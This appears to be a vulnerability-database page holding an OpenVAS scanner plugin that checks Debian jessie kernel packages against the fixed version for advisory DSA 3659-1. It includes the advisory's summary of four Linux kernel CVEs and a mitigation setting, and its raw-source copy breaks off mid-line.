ID OPENVAS:1361412562310703659 Type openvas Reporter Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net Modified 2019-03-18T00:00:00
Description
Several vulnerabilities have been
discovered in the Linux kernel that may lead to a privilege escalation,
denial of service or have other impacts.
CVE-2016-5696
Yue Cao, Zhiyun Qian, Zhongjie Wang, Tuan Dao, and Srikanth V.
Krishnamurthy of the University of California, Riverside, and Lisa
M. Marvel of the United States Army Research Laboratory discovered
that Linux
# OpenVAS Vulnerability Test
# $Id: deb_3659.nasl 14279 2019-03-18 14:48:34Z cfischer $
# Auto-generated from advisory DSA 3659-1 using nvtgen 1.0
# Script version: 1.0
#
# Author:
# Greenbone Networks
#
# Copyright:
# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net
# Text descriptions are largely excerpted from the referenced
# advisory, and are Copyright (c) the respective author(s)
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Metadata pass. The scanner first runs the script with `description` set,
# collects the registration below, and leaves at the exit(0) that closes
# this block; the package checks further down run only on the real pass.
if(description)
{
# Plugin OID and the SVN revision this generated script was built from.
script_oid("1.3.6.1.4.1.25623.1.0.703659");
script_version("$Revision: 14279 $");
# The four CVEs covered by DSA 3659-1.
script_cve_id("CVE-2016-5696", "CVE-2016-6136", "CVE-2016-6480", "CVE-2016-6828");
script_name("Debian Security Advisory DSA 3659-1 (linux - security update)");
script_tag(name:"last_modification", value:"$Date: 2019-03-18 15:48:34 +0100 (Mon, 18 Mar 2019) $");
script_tag(name:"creation_date", value:"2016-09-04 00:00:00 +0200 (Sun, 04 Sep 2016)");
# CVSS v2 base score/vector carried over from the advisory record.
script_tag(name:"cvss_base", value:"5.8");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:N/I:P/A:P");
script_tag(name:"solution_type", value:"VendorFix");
# QoD type "package": the verdict rests on installed package versions,
# not on probing the vulnerable code path (see the vuldetect tag below).
script_tag(name:"qod_type", value:"package");
script_xref(name:"URL", value:"http://www.debian.org/security/2016/dsa-3659.html");
# Local, non-intrusive check. It is scheduled only when gather-package-list.nasl
# has stored a dpkg package list from a Debian host whose release key matches
# DEB8 (jessie); the `ssh/login/*` key names indicate the list is collected
# over an authenticated SSH session.
script_category(ACT_GATHER_INFO);
script_copyright("Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net");
script_family("Debian Local Security Checks");
script_dependencies("gather-package-list.nasl");
script_mandatory_keys("ssh/login/debian_linux", "ssh/login/packages", re:"ssh/login/release=DEB8");
script_tag(name:"affected", value:"linux on Debian Linux");
# The fixed version named here (3.16.36-1+deb8u1) is the same one every
# isdpkgvuln() call below compares against.
script_tag(name:"solution", value:"For the stable distribution (jessie),
these problems have been fixed in version 3.16.36-1+deb8u1. In addition, this
update contains several changes originally targeted for the upcoming jessie
point release.
We recommend that you upgrade your linux packages.");
# Summary text is excerpted from the advisory (see file header). Note that the
# CVE-2016-5696 paragraph carries the advisory's own interim mitigation (the
# tcp_challenge_ack_limit sysctl) in addition to the VendorFix solution.
script_tag(name:"summary", value:"Several vulnerabilities have been
discovered in the Linux kernel that may lead to a privilege escalation,
denial of service or have other impacts.
CVE-2016-5696
Yue Cao, Zhiyun Qian, Zhongjie Wang, Tuan Dao, and Srikanth V.
Krishnamurthy of the University of California, Riverside, and Lisa
M. Marvel of the United States Army Research Laboratory discovered
that Linux's implementation of the TCP Challenge ACK feature
results in a side channel that can be used to find TCP connections
between specific IP addresses, and to inject messages into those
connections.
Where a service is made available through TCP, this may allow
remote attackers to impersonate another connected user to the
server or to impersonate the server to another connected user. In
case the service uses a protocol with message authentication
(e.g. TLS or SSH), this vulnerability only allows denial of
service (connection failure). An attack takes tens of seconds, so
short-lived TCP connections are also unlikely to be vulnerable.
This may be mitigated by increasing the rate limit for TCP
Challenge ACKs so that it is never exceeded:
sysctl net.ipv4.tcp_challenge_ack_limit=1000000000
CVE-2016-6136
Pengfei Wang discovered that the audit subsystem has a
'double-fetch' or TOCTTOU
bug in its handling of special
characters in the name of an executable. Where audit logging of
execve() is enabled, this allows a local user to generate
misleading log messages.
CVE-2016-6480
Pengfei Wang discovered that the aacraid driver for Adaptec RAID
controllers has a 'double-fetch' or TOCTTOU bug in its
validation of FIB
messages passed through the ioctl() system
call. This has no practical security impact in current Debian
releases.
CVE-2016-6828
Marco Grassi reported a 'use-after-free' bug in the TCP
implementation, which can be triggered by local users. The
security impact is unclear, but might include denial of service or
privilege escalation.");
script_tag(name:"vuldetect", value:"This check tests the installed software version using the apt package manager.");
# Nothing below this point runs during the metadata pass.
exit(0);
}
include("revisions-lib.inc");
include("pkg-lib-deb.inc");
# Version check. Every binary package built from the jessie "linux" source
# is compared against the fixed version 3.16.36-1+deb8u1 for release DEB8.
# isdpkgvuln() (pkg-lib-deb.inc) returns a report fragment for a package
# whose installed version is older than the fixed one, and NULL otherwise;
# fragments are appended to `report` in list order, exactly as the original
# one-if-per-package sequence did. `res` keeps the last helper result.
#
# NOTE(review): several linux-*-3.2.0-4-* names (a wheezy-era kernel ABI)
# appear in this auto-generated list; they are kept verbatim so the checked
# set is unchanged — verify against the DSA 3659-1 package list.
res = "";
report = "";

foreach pkg (make_list(
  "linux-compiler-gcc-4.8-arm",
  "linux-compiler-gcc-4.8-s390",
  "linux-compiler-gcc-4.8-x86",
  "linux-doc-3.16",
  "linux-headers-3.16.0-4-4kc-malta",
  "linux-headers-3.16.0-4-586",
  "linux-headers-3.16.0-4-5kc-malta",
  "linux-headers-3.16.0-4-686-pae",
  "linux-headers-3.16.0-4-all",
  "linux-headers-3.16.0-4-all-amd64",
  "linux-headers-3.16.0-4-all-arm64",
  "linux-headers-3.16.0-4-all-armel",
  "linux-headers-3.16.0-4-all-armhf",
  "linux-headers-3.16.0-4-all-i386",
  "linux-headers-3.16.0-4-all-mips",
  "linux-headers-3.16.0-4-all-mipsel",
  "linux-headers-3.16.0-4-all-powerpc",
  "linux-headers-3.16.0-4-all-ppc64el",
  "linux-headers-3.16.0-4-all-s390x",
  "linux-headers-3.16.0-4-amd64",
  "linux-headers-3.16.0-4-arm64",
  "linux-headers-3.16.0-4-armmp",
  "linux-headers-3.16.0-4-armmp-lpae",
  "linux-headers-3.16.0-4-common",
  "linux-headers-3.16.0-4-ixp4xx",
  "linux-headers-3.16.0-4-kirkwood",
  "linux-headers-3.16.0-4-loongson-2e",
  "linux-headers-3.16.0-4-loongson-2f",
  "linux-headers-3.16.0-4-loongson-3",
  "linux-headers-3.16.0-4-octeon",
  "linux-headers-3.16.0-4-orion5x",
  "linux-headers-3.16.0-4-powerpc",
  "linux-headers-3.16.0-4-powerpc-smp",
  "linux-headers-3.16.0-4-powerpc64",
  "linux-headers-3.16.0-4-powerpc64le",
  "linux-headers-3.16.0-4-r4k-ip22",
  "linux-headers-3.16.0-4-r5k-ip32",
  "linux-headers-3.16.0-4-s390x",
  "linux-headers-3.16.0-4-sb1-bcm91250a",
  "linux-headers-3.16.0-4-versatile",
  "linux-headers-3.2.0-4-4kc-malta",
  "linux-headers-3.2.0-4-5kc-malta",
  "linux-headers-3.2.0-4-all",
  "linux-headers-3.2.0-4-all-mips",
  "linux-headers-3.2.0-4-all-mipsel",
  "linux-headers-3.2.0-4-common",
  "linux-headers-3.2.0-4-loongson-2f",
  "linux-headers-3.2.0-4-octeon",
  "linux-headers-3.2.0-4-r4k-ip22",
  "linux-headers-3.2.0-4-r5k-cobalt",
  "linux-headers-3.2.0-4-r5k-ip32",
  "linux-headers-3.2.0-4-sb1-bcm91250a",
  "linux-headers-3.2.0-4-sb1a-bcm91480b",
  "linux-image-3.16.0-4-4kc-malta",
  "linux-image-3.16.0-4-586",
  "linux-image-3.16.0-4-5kc-malta",
  "linux-image-3.16.0-4-686-pae",
  "linux-image-3.16.0-4-686-pae-dbg",
  "linux-image-3.16.0-4-amd64",
  "linux-image-3.16.0-4-amd64-dbg",
  "linux-image-3.16.0-4-arm64",
  "linux-image-3.16.0-4-arm64-dbg",
  "linux-image-3.16.0-4-armmp",
  "linux-image-3.16.0-4-armmp-lpae",
  "linux-image-3.16.0-4-ixp4xx",
  "linux-image-3.16.0-4-kirkwood",
  "linux-image-3.16.0-4-loongson-2e",
  "linux-image-3.16.0-4-loongson-2f",
  "linux-image-3.16.0-4-loongson-3",
  "linux-image-3.16.0-4-octeon",
  "linux-image-3.16.0-4-orion5x",
  "linux-image-3.16.0-4-powerpc",
  "linux-image-3.16.0-4-powerpc-smp",
  "linux-image-3.16.0-4-powerpc64",
  "linux-image-3.16.0-4-powerpc64le",
  "linux-image-3.16.0-4-r4k-ip22",
  "linux-image-3.16.0-4-r5k-ip32",
  "linux-image-3.16.0-4-s390x",
  "linux-image-3.16.0-4-s390x-dbg",
  "linux-image-3.16.0-4-sb1-bcm91250a",
  "linux-image-3.16.0-4-versatile",
  "linux-image-3.2.0-4-4kc-malta",
  "linux-image-3.2.0-4-5kc-malta",
  "linux-image-3.2.0-4-loongson-2f",
  "linux-image-3.2.0-4-octeon",
  "linux-image-3.2.0-4-r4k-ip22",
  "linux-image-3.2.0-4-r5k-cobalt",
  "linux-image-3.2.0-4-r5k-ip32",
  "linux-image-3.2.0-4-sb1-bcm91250a",
  "linux-image-3.2.0-4-sb1a-bcm91480b",
  "linux-libc-dev",
  "linux-manual-3.16",
  "linux-source-3.16",
  "linux-support-3.16.0-4",
  "xen-linux-system-3.16.0-4-amd64")) {

  # Same comparison the generator emitted per package: fixed version and
  # release are identical for every entry, so they are spelled out once.
  res = isdpkgvuln(pkg:pkg, ver:"3.16.36-1+deb8u1", rls:"DEB8");
  if(res != NULL) {
    report += res;
  }
}
# Verdict. A non-empty report means at least one listed package is below the
# fixed version and is raised via security_message(). With no findings the
# script ends with exit(99) only when __pkg_match is set — presumably by the
# pkg-lib-deb helpers when a listed package was found installed at all, so an
# unaffected host can be told apart from one where nothing matched; confirm
# against pkg-lib-deb.inc.
if(report == "") {
  if(__pkg_match) {
    exit(99);
  }
} else {
  security_message(data:report);
}
{"id": "OPENVAS:1361412562310703659", "type": "openvas", "bulletinFamily": "scanner", "title": "Debian Security Advisory DSA 3659-1 (linux - security update)", "description": "Several vulnerabilities have been\n discovered in the Linux kernel that may lead to a privilege escalation,\n denial of service or have other impacts.\n\nCVE-2016-5696\nYue Cao, Zhiyun Qian, Zhongjie Wang, Tuan Dao, and Srikanth V.\nKrishnamurthy of the University of California, Riverside, and Lisa\nM. Marvel of the United States Army Research Laboratory discovered\nthat Linux", "published": "2016-09-04T00:00:00", "modified": "2019-03-18T00:00:00", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703659", "reporter": "Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net", "references": ["http://www.debian.org/security/2016/dsa-3659.html"], "cvelist": ["CVE-2016-6480", "CVE-2016-5696", "CVE-2016-6136", "CVE-2016-6828"], "lastseen": "2019-05-29T18:35:16", "viewCount": 13, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2016-6480", "CVE-2016-5696", "CVE-2016-6136", "CVE-2016-6828"]}, {"type": "android", "idList": ["ANDROID:CVE-2016-6828"]}, {"type": "debian", "idList": ["DEBIAN:DSA-3659-1:3F508", "DEBIAN:DLA-609-1:1025A"]}, {"type": "nessus", "idList": ["UBUNTU_USN-3098-1.NASL", "UBUNTU_USN-3099-3.NASL", "UBUNTU_USN-3097-1.NASL", "DEBIAN_DLA-609.NASL", "FEDORA_2016-F1ADAAADC6.NASL", "UBUNTU_USN-3099-4.NASL", "UBUNTU_USN-3099-2.NASL", "DEBIAN_DSA-3659.NASL", "UBUNTU_USN-3098-2.NASL", "FEDORA_2016-2E5EBFED6D.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310842910", "OPENVAS:703659", "OPENVAS:1361412562310842907", "OPENVAS:1361412562310842908", "OPENVAS:1361412562310842916", "OPENVAS:1361412562310842911", "OPENVAS:1361412562310842912", "OPENVAS:1361412562310842909", "OPENVAS:1361412562310809207", "OPENVAS:1361412562310809206"]}, {"type": "f5", "idList": 
["F5:K37046163", "SOL46514822", "F5:K62442245", "F5:K46514822", "F5:K90803619"]}, {"type": "ubuntu", "idList": ["USN-3099-3", "USN-3099-2", "USN-3098-2", "USN-3097-2", "USN-3097-1", "USN-3099-1", "USN-3098-1", "USN-3099-4"]}, {"type": "fedora", "idList": ["FEDORA:EF73760748F5", "FEDORA:6675C6051CCF"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:DC8819DC530904F76913C7D9F499576C"]}, {"type": "redhat", "idList": ["RHSA-2016:1664", "RHSA-2016:1633", "RHSA-2016:1632", "2438571", "RHSA-2016:1815", "RHSA-2016:1631", "RHSA-2016:1939"]}, {"type": "suse", "idList": ["SUSE-SU-2016:3069-1", "SUSE-SU-2016:2230-1"]}, {"type": "oraclelinux", "idList": ["ELSA-2016-3594", "ELSA-2016-1664", "ELSA-2016-1633", "ELSA-2016-3595"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20160907-01-TCP"]}, {"type": "thn", "idList": ["THN:B41554BF406DE03F01F4B7A7E4CD2A52", "THN:4FE2068BDC86E2EECDC3F2C86932F8F2"]}, {"type": "archlinux", "idList": ["ASA-201608-15", "ASA-201608-17", "ASA-201608-13", "ASA-201608-12"]}, {"type": "paloalto", "idList": ["PAN-SA-2017-0015"]}, {"type": "centos", "idList": ["CESA-2016:1664", "CESA-2016:1633"]}, {"type": "symantec", "idList": ["SMNTC-1378"]}, {"type": "exploitdb", "idList": ["EDB-ID:40731"]}], "modified": "2019-05-29T18:35:16", "rev": 2}, "score": {"value": 6.3, "vector": "NONE", "modified": "2019-05-29T18:35:16", "rev": 2}, "vulnersScore": 6.3}, "pluginID": "1361412562310703659", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3659.nasl 14279 2019-03-18 14:48:34Z cfischer $\n# Auto-generated from advisory DSA 3659-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free 
Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703659\");\n script_version(\"$Revision: 14279 $\");\n script_cve_id(\"CVE-2016-5696\", \"CVE-2016-6136\", \"CVE-2016-6480\", \"CVE-2016-6828\");\n script_name(\"Debian Security Advisory DSA 3659-1 (linux - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:48:34 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-09-04 00:00:00 +0200 (Sun, 04 Sep 2016)\");\n script_tag(name:\"cvss_base\", value:\"5.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2016/dsa-3659.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n script_tag(name:\"affected\", value:\"linux on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (jessie),\n these problems have been fixed in version 3.16.36-1+deb8u1. 
In addition, this\n update contains several changes originally targeted for the upcoming jessie\n point release.\n\n We recommend that you upgrade your linux packages.\");\n script_tag(name:\"summary\", value:\"Several vulnerabilities have been\n discovered in the Linux kernel that may lead to a privilege escalation,\n denial of service or have other impacts.\n\nCVE-2016-5696\nYue Cao, Zhiyun Qian, Zhongjie Wang, Tuan Dao, and Srikanth V.\nKrishnamurthy of the University of California, Riverside, and Lisa\nM. Marvel of the United States Army Research Laboratory discovered\nthat Linux's implementation of the TCP Challenge ACK feature\nresults in a side channel that can be used to find TCP connections\nbetween specific IP addresses, and to inject messages into those\nconnections.\n\nWhere a service is made available through TCP, this may allow\nremote attackers to impersonate another connected user to the\nserver or to impersonate the server to another connected user. In\ncase the service uses a protocol with message authentication\n(e.g. TLS or SSH), this vulnerability only allows denial of\nservice (connection failure). An attack takes tens of seconds, so\nshort-lived TCP connections are also unlikely to be vulnerable.\n\nThis may be mitigated by increasing the rate limit for TCP\nChallenge ACKs so that it is never exceeded:\nsysctl net.ipv4.tcp_challenge_ack_limit=1000000000\n\nCVE-2016-6136\nPengfei Wang discovered that the audit subsystem has a\n'double-fetch' or TOCTTOU\nbug in its handling of special\ncharacters in the name of an executable. Where audit logging of\nexecve() is enabled, this allows a local user to generate\nmisleading log messages.\n\nCVE-2016-6480\nPengfei Wang discovered that the aacraid driver for Adaptec RAID\ncontrollers has a 'double-fetch' or TOCTTOU bug in its\nvalidation of FIB\nmessages passed through the ioctl() system\ncall. 
This has no practical security impact in current Debian\nreleases.\n\nCVE-2016-6828\nMarco Grassi reported a 'use-after-free' bug in the TCP\nimplementation, which can be triggered by local users. The\nsecurity impact is unclear, but might include denial of service or\nprivilege escalation.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res = isdpkgvuln(pkg:\"linux-compiler-gcc-4.8-arm\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-compiler-gcc-4.8-s390\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-compiler-gcc-4.8-x86\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-doc-3.16\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-4kc-malta\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-586\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-5kc-malta\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-686-pae\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-amd64\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-arm64\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = 
isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-armel\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-armhf\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-i386\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-mips\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-mipsel\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-powerpc\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-ppc64el\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-s390x\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-amd64\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-arm64\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-armmp\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-armmp-lpae\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-common\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-ixp4xx\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-kirkwood\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n 
report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-loongson-2e\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-loongson-2f\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-loongson-3\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-octeon\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-orion5x\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-powerpc\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-powerpc-smp\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-powerpc64\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-powerpc64le\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-r4k-ip22\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-r5k-ip32\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-s390x\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-sb1-bcm91250a\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-versatile\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-4kc-malta\", 
ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-5kc-malta\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-mips\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-mipsel\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-common\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-loongson-2f\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-octeon\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-r4k-ip22\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-r5k-cobalt\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-r5k-ip32\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-sb1-bcm91250a\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-sb1a-bcm91480b\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-4kc-malta\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-586\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = 
isdpkgvuln(pkg:\"linux-image-3.16.0-4-5kc-malta\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-686-pae\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-686-pae-dbg\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-amd64\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-amd64-dbg\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-arm64\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-arm64-dbg\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-armmp\", ver:\"3.16.36-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = 